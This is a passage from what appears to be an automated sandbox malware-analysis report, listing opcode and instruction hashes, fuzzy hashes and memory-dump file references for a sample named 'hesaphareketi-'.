                                            • Opcode Fuzzy Hash: 2f1002e21922b5647fed7a3b182dd3ec563bb6f0847d442a22830ef2e1dda77f
                                            • Instruction Fuzzy Hash: 4721F679F003548FCF62BB789C8476E7BA1EB48350F15452AD909C7359EA35CD068B92
                                            Memory Dump Source
                                            • Source File: 00000004.00000002.3682796093.0000000000CF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00CF0000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_4_2_cf0000_hesaphareketi-.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 1ad43cc94dc04e91cd4f9bd88a83c0a4cc6af78968424111bb44e5081f9e9762
                                            • Instruction ID: 21ef01ea5505937d7b5520230f54f8ee5b0f521e9adbdfcff6c6cd39b16cba52
                                            • Opcode Fuzzy Hash: 1ad43cc94dc04e91cd4f9bd88a83c0a4cc6af78968424111bb44e5081f9e9762
                                            • Instruction Fuzzy Hash: C821DE31A00259CFDFB59FB884402BD7BA5EF95320F28047ADA15E7252D635DE82CB62
                                            Memory Dump Source
                                            • Source File: 00000004.00000002.3682796093.0000000000CF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00CF0000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_4_2_cf0000_hesaphareketi-.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 9b9c43278499d9b6e54ac632f94a7fc4a10d157ff68ed341c8b6358cc02e57bf
                                            • Instruction ID: bf6b4f8a80c43de3cc71ccb3d0827d7c06c1593d589f3c31f0115e4a0ed696b2
                                            • Opcode Fuzzy Hash: 9b9c43278499d9b6e54ac632f94a7fc4a10d157ff68ed341c8b6358cc02e57bf
                                            • Instruction Fuzzy Hash: 06317C30E002099BDF59CF65D4907AEBBB2EF89300F108629E912EB295EB719D46CB51
                                            Memory Dump Source
                                            • Source File: 00000004.00000002.3682796093.0000000000CF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00CF0000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_4_2_cf0000_hesaphareketi-.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 27089641f59d5f70c2ce890f3aada970b2ffaabceba7ff6122ce9e38501f987e
                                            • Instruction ID: ddf98096b6e732bd98a54af8425beb92151d0f3d97e81a4a37592db07f107954
                                            • Opcode Fuzzy Hash: 27089641f59d5f70c2ce890f3aada970b2ffaabceba7ff6122ce9e38501f987e
                                            • Instruction Fuzzy Hash: A3210C347002149FD709AB78D894B6E7BA7EBC8711B108468E5069B3A8DF759C43DB50
                                            Memory Dump Source
                                            • Source File: 00000004.00000002.3682796093.0000000000CF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00CF0000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_4_2_cf0000_hesaphareketi-.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 9414115a12bb10a6737c8390630c4aa5961d6de3964a3401c03ca81f4bb2f87d
                                            • Instruction ID: 19488c66b6be531e6230ad1235d52071f36ef0bd723eeee68bf418678ccd6b56
                                            • Opcode Fuzzy Hash: 9414115a12bb10a6737c8390630c4aa5961d6de3964a3401c03ca81f4bb2f87d
                                            • Instruction Fuzzy Hash: D0217838A002008FDF62FB34ECC47393B61EB41351F190A66E406CB2A9DA20DD4B9B93
                                            Memory Dump Source
                                            • Source File: 00000004.00000002.3682796093.0000000000CF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00CF0000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_4_2_cf0000_hesaphareketi-.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 50d939e1e1355211d159bc1cc76ad8e847af1f976f21c83dd6ba4607f2dd18a5
                                            • Instruction ID: 0e7744c04f8e48e74be306be55bf41bec4d051d68d88b88641d9f1950c8fea65
                                            • Opcode Fuzzy Hash: 50d939e1e1355211d159bc1cc76ad8e847af1f976f21c83dd6ba4607f2dd18a5
                                            • Instruction Fuzzy Hash: E1218F30E002099BDF59CF65D4907AEB7B2FF89300F108629E915EB294DB70AD46CB91
                                            Memory Dump Source
                                            • Source File: 00000004.00000002.3682796093.0000000000CF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00CF0000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_4_2_cf0000_hesaphareketi-.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: e1f6c8852122cc926134d4eec01b18e1d3e21a79fd79c4e9885139f825e8e9e6
                                            • Instruction ID: 3c2e73f92b3363eb3c48e853355dccbb93aaeca446f70f537aed72e4fbe84320
                                            • Opcode Fuzzy Hash: e1f6c8852122cc926134d4eec01b18e1d3e21a79fd79c4e9885139f825e8e9e6
                                            • Instruction Fuzzy Hash: 2421B535E002199BDF49CFA5C444BEEF7B1EF89310F20862AE915BB240DB709D46CB51
                                            Memory Dump Source
                                            • Source File: 00000004.00000002.3682796093.0000000000CF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00CF0000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_4_2_cf0000_hesaphareketi-.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 6cc13c3f10bd7409a68afbff0696d2b10a641c87aa75baed778b7da78f28139f
                                            • Instruction ID: 48192f33eb6dcbba914e2cf17c7448b64b40109ea47b931adfecf8479e94e7d3
                                            • Opcode Fuzzy Hash: 6cc13c3f10bd7409a68afbff0696d2b10a641c87aa75baed778b7da78f28139f
                                            • Instruction Fuzzy Hash: 57210C34700249CFDB54EB78C959BAE7BF1EF48350B2044A8E606EB361DB359D41CB61
                                            Memory Dump Source
                                            • Source File: 00000004.00000002.3681398682.0000000000C5D000.00000040.00000800.00020000.00000000.sdmp, Offset: 00C5D000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_4_2_c5d000_hesaphareketi-.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 8e0ab5684ee46acf3020893c2a5909c8afcf13e16ecc3662dab5e41329d4a011
                                            • Instruction ID: bbebcc482d4a2a180c8ec74cb2a9b1fa9a77813b2a272093a3fe0f27d5d782e6
                                            • Opcode Fuzzy Hash: 8e0ab5684ee46acf3020893c2a5909c8afcf13e16ecc3662dab5e41329d4a011
                                            • Instruction Fuzzy Hash: E3210479604300DFDB24DF10D984B16BB65FB84321F20C669DC0A0B246C336DC8ACAA6
                                            Memory Dump Source
                                            • Source File: 00000004.00000002.3681398682.0000000000C5D000.00000040.00000800.00020000.00000000.sdmp, Offset: 00C5D000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_4_2_c5d000_hesaphareketi-.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 0f45e2afa95d921c8496cef09676fdd3d940daa49d302cdb65233af170394939
                                            • Instruction ID: 75f084b8dd006d960863bb06f152ffef8f0452871fbc6cda1a1a154047f51fff
                                            • Opcode Fuzzy Hash: 0f45e2afa95d921c8496cef09676fdd3d940daa49d302cdb65233af170394939
                                            • Instruction Fuzzy Hash: AB21F579604340DFDB24DF14D5C0B16BB65FB84316F20C5ADEC4B4B292C336E88ACA66
                                            Memory Dump Source
                                            • Source File: 00000004.00000002.3681398682.0000000000C5D000.00000040.00000800.00020000.00000000.sdmp, Offset: 00C5D000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_4_2_c5d000_hesaphareketi-.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 4ff217fe1b997f8aa7fbce59f8a67935f410d1e8b378779e0676ef0fccd8155e
                                            • Instruction ID: 5874d9de6620adde98a4d0973e7206cfd5d256c31e65f517b7c3e8a82d29f7f8
                                            • Opcode Fuzzy Hash: 4ff217fe1b997f8aa7fbce59f8a67935f410d1e8b378779e0676ef0fccd8155e
                                            • Instruction Fuzzy Hash: 5B21D379604300DFDB24DF14D9C4B16BB65EBC4315F20C569DC4A4B296C336D88BCA66
                                            Memory Dump Source
                                            • Source File: 00000004.00000002.3682796093.0000000000CF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00CF0000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_4_2_cf0000_hesaphareketi-.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: dd828344a31885caedfa9f9edd272d151e8cb01984d650a627d63579714315f8
                                            • Instruction ID: f81d2dfc9afa06cda88f8e6a712b65c6c1d62f8ec1809fe143e480fb16e7f200
                                            • Opcode Fuzzy Hash: dd828344a31885caedfa9f9edd272d151e8cb01984d650a627d63579714315f8
                                            • Instruction Fuzzy Hash: D1218331E006199BDF49CFA5C444BAEF7B2EF89310F20852AE915BB340DB70AD42CB51
                                            Memory Dump Source
                                            • Source File: 00000004.00000002.3682796093.0000000000CF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00CF0000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_4_2_cf0000_hesaphareketi-.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 554534e9c1d6fbe41ff968539e58341bc661240e908733d0ad9ab38602825804
                                            • Instruction ID: 2ce606a48d95f7ae3a2733ee85324cd9c256060955cee8a20dd80da1b12803b3
                                            • Opcode Fuzzy Hash: 554534e9c1d6fbe41ff968539e58341bc661240e908733d0ad9ab38602825804
                                            • Instruction Fuzzy Hash: D3213C30B00248CFDB64EB75C5657AE77F6AB49340F240468DA06EB390DF729E41CBA2
                                            Memory Dump Source
                                            • Source File: 00000004.00000002.3682796093.0000000000CF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00CF0000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_4_2_cf0000_hesaphareketi-.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: de55bbc704931fa581789dbf9e149a692ad3d4c6c2ef11c479fb159bdaca9ba7
                                            • Instruction ID: 2aacf6c7a5d96a613ada61f6e3e63392a32d46f7daf43dd78a8f51338e29580e
                                            • Opcode Fuzzy Hash: de55bbc704931fa581789dbf9e149a692ad3d4c6c2ef11c479fb159bdaca9ba7
                                            • Instruction Fuzzy Hash: F321D538A002148FDF61FB64ECC472A3755EB44355F154A25E50ACB2A8DE24ED469BD2
                                            Memory Dump Source
                                            • Source File: 00000004.00000002.3682796093.0000000000CF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00CF0000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_4_2_cf0000_hesaphareketi-.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 797ab4ea38139f9a514bb2bc9ebeaa7ff65c9b00df77a762bc4d5e4814cce9f0
                                            • Instruction ID: 12e0054f8f10f7eead02364c92381d63647ca4ca0af92f0d3b7f84afab226824
                                            • Opcode Fuzzy Hash: 797ab4ea38139f9a514bb2bc9ebeaa7ff65c9b00df77a762bc4d5e4814cce9f0
                                            • Instruction Fuzzy Hash: BC214C30B00258CFDB64EB74C5647BE77F1AB49344F280468DA05EB391DB769E41CBA2
                                            Memory Dump Source
                                            • Source File: 00000004.00000002.3682796093.0000000000CF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00CF0000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_4_2_cf0000_hesaphareketi-.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: f5856aaac6d3d51f5617a4371023caf956b4e02a63233e66a6f6dff1df3847d8
                                            • Instruction ID: 1601bec413c513d33b471e8b1181256ddff104196625d72cc5580ea7395496e0
                                            • Opcode Fuzzy Hash: f5856aaac6d3d51f5617a4371023caf956b4e02a63233e66a6f6dff1df3847d8
                                            • Instruction Fuzzy Hash: CE21CB34700609CFDB54EB78C959BAE77F1EB48750F204468E606EB361DB359D41CBA1
                                            Memory Dump Source
                                            • Source File: 00000004.00000002.3682796093.0000000000CF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00CF0000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_4_2_cf0000_hesaphareketi-.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 55c1a6c40854d3d18daac1e604d1749081dd93e91898ed1a250f2bdc839745cd
                                            • Instruction ID: a7472ff39393cc1cc9f5fb8783e905a13c676bb707ee9b4bb0e4d41d9359b34f
                                            • Opcode Fuzzy Hash: 55c1a6c40854d3d18daac1e604d1749081dd93e91898ed1a250f2bdc839745cd
                                            • Instruction Fuzzy Hash: C511E234A003085BEF655BB4D9403793B61EB86B90F314879D552CF2C3DA21CE468BD3
                                            Memory Dump Source
                                            • Source File: 00000004.00000002.3682796093.0000000000CF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00CF0000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_4_2_cf0000_hesaphareketi-.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 93bf0026d1ae74476a0ef2743149528cb415e6a2856dde2ce4104a6c0adf8574
                                            • Instruction ID: 2f760a9b53042a290b26ec597ca4dc22d9874a6e9007f4f5c79a412831d23d9a
                                            • Opcode Fuzzy Hash: 93bf0026d1ae74476a0ef2743149528cb415e6a2856dde2ce4104a6c0adf8574
                                            • Instruction Fuzzy Hash: 6911C434B0020C8BEFA46B79D9443793752EB85BA5F314839D212CF2C3DA61CE468BD2
                                            Memory Dump Source
                                            • Source File: 00000004.00000002.3681398682.0000000000C5D000.00000040.00000800.00020000.00000000.sdmp, Offset: 00C5D000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_4_2_c5d000_hesaphareketi-.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 99ab6e0c048bdb26a5422364894f661a2a28c7a66b6d15b4835b2ad9b0260261
                                            • Instruction ID: 94caeb92b51dad494717bf13fde8e90195b8e6f69ff6453f51fa547f4cddc8b2
                                            • Opcode Fuzzy Hash: 99ab6e0c048bdb26a5422364894f661a2a28c7a66b6d15b4835b2ad9b0260261
                                            • Instruction Fuzzy Hash: DE2192755093C08FCB12CF24D990715BF71EB86314F28C5EAD8498F2A7C33A984ACB62
                                            Memory Dump Source
                                            • Source File: 00000004.00000002.3682796093.0000000000CF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00CF0000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_4_2_cf0000_hesaphareketi-.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 1b643e99657bf522cdb77efdebc0f3bc6f82f4101ddb8f68673e996a5709bd2d
                                            • Instruction ID: 0e98e285815b6ddbb52b3139a799376d7bc4ddb352d15cb19afb0d1a6bd7e662
                                            • Opcode Fuzzy Hash: 1b643e99657bf522cdb77efdebc0f3bc6f82f4101ddb8f68673e996a5709bd2d
                                            • Instruction Fuzzy Hash: A4012D31E0121ACBCF65EFB984511BD7BF5AB88360B28047ADA05E7202E635D941CB92
                                            Memory Dump Source
                                            • Source File: 00000004.00000002.3681398682.0000000000C5D000.00000040.00000800.00020000.00000000.sdmp, Offset: 00C5D000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_4_2_c5d000_hesaphareketi-.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 4ccb17c466d2e34b86bde66ac975e9cbefd8e24c09005379d072ef0b40a0d1c0
                                            • Instruction ID: 2eafc5e6f84e3203c374c3e39b29bd00550d04b0fff0d3cc7f3efe5d21efd01d
                                            • Opcode Fuzzy Hash: 4ccb17c466d2e34b86bde66ac975e9cbefd8e24c09005379d072ef0b40a0d1c0
                                            • Instruction Fuzzy Hash: 18118B79504280DFCB15CF14D5C4B15BBA2FB84325F24C6A9DC4A4B696C33AE98ACB62
                                            Memory Dump Source
                                            • Source File: 00000004.00000002.3681398682.0000000000C5D000.00000040.00000800.00020000.00000000.sdmp, Offset: 00C5D000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_4_2_c5d000_hesaphareketi-.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: bf2aa0ac69dbfc9ab00947b0048f034b327edea99ed69b312f674443a93577a4
                                            • Instruction ID: 4dfa928f8a49ab115e5db99e43dcd3923181f06cef60454083f97887d347272a
                                            • Opcode Fuzzy Hash: bf2aa0ac69dbfc9ab00947b0048f034b327edea99ed69b312f674443a93577a4
                                            • Instruction Fuzzy Hash: 9A11B279504380CFDB11CF14D9C4B15FB61FB84324F24C6A9DC494B656C33AD94ACB91
                                            Memory Dump Source
                                            • Source File: 00000004.00000002.3680415052.0000000000C4D000.00000040.00000800.00020000.00000000.sdmp, Offset: 00C4D000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_4_2_c4d000_hesaphareketi-.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 95793b73af886b8cea67649aed5d62b59c68df8c82919e84ae0d7132d5f87bb8
                                            • Instruction ID: 945f2ad49efede7367b83bea9f3bb2e5b453fa6d77478d688798466ae4f4dd63
                                            • Opcode Fuzzy Hash: 95793b73af886b8cea67649aed5d62b59c68df8c82919e84ae0d7132d5f87bb8
                                            • Instruction Fuzzy Hash: E901F2314083049AE7206A12DC84B76BF98FF51325F28C02AED6A5E2C2C6799C44CAB2
                                            Memory Dump Source
                                            • Source File: 00000004.00000002.3682796093.0000000000CF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00CF0000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_4_2_cf0000_hesaphareketi-.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 80edadb1c32c062b7d682a0801fb307b0fde6a0d8413112422faf4ca3ddf6f60
                                            • Instruction ID: c4bfc9c124a3e5edc40f078672b2ffc309b4c9ff897c7a04d14cf2266daa05ae
                                            • Opcode Fuzzy Hash: 80edadb1c32c062b7d682a0801fb307b0fde6a0d8413112422faf4ca3ddf6f60
                                            • Instruction Fuzzy Hash: 610184349113589FEF15FF75ED8169D7FB1EF81300F1082A9C4089B199DE30AA06DB82
                                            Memory Dump Source
                                            • Source File: 00000004.00000002.3682796093.0000000000CF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00CF0000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_4_2_cf0000_hesaphareketi-.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 341707da196e56df8d9fde59c8c97e7543c49db99822d0c7e1843f36f42d1928
                                            • Instruction ID: 31e53f4da45af3183d248d491eafaf315d0612ca4007391a31ad6eceeac98302
                                            • Opcode Fuzzy Hash: 341707da196e56df8d9fde59c8c97e7543c49db99822d0c7e1843f36f42d1928
                                            • Instruction Fuzzy Hash: B5F0F636A04158CBDB61CBA584911BCBFB0FAD536172C409BDE45DB212D234D942D713
                                            Memory Dump Source
                                            • Source File: 00000004.00000002.3680415052.0000000000C4D000.00000040.00000800.00020000.00000000.sdmp, Offset: 00C4D000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_4_2_c4d000_hesaphareketi-.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 2bfd64fee4370a8b1011c8bef30e4e60233b35d1c2024ccc4f1cdd665cec22a0
                                            • Instruction ID: 005cda099eb402f467a68c8da307cda2e04cff1073a0a1f7342bc25ceefe3199
                                            • Opcode Fuzzy Hash: 2bfd64fee4370a8b1011c8bef30e4e60233b35d1c2024ccc4f1cdd665cec22a0
                                            • Instruction Fuzzy Hash: 31F0F6714043449EE7149A05DC84B66FFA8FF51334F18C05EED595B282C279AC44CBB1
                                            Memory Dump Source
                                            • Source File: 00000004.00000002.3682796093.0000000000CF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00CF0000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_4_2_cf0000_hesaphareketi-.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 5a236d43b7d4829df213580fe1742e4d14dba29dbf82a5a083fa9f2807120d17
                                            • Instruction ID: b7e994d0f4c7af2d550e00d018cb89af09002508d95d73858bc238a1e9b51086
                                            • Opcode Fuzzy Hash: 5a236d43b7d4829df213580fe1742e4d14dba29dbf82a5a083fa9f2807120d17
                                            • Instruction Fuzzy Hash: 0EF036349102189FDB05FFA4ED8169D7BB1EF80300F5046A5C0089B199EE307E069791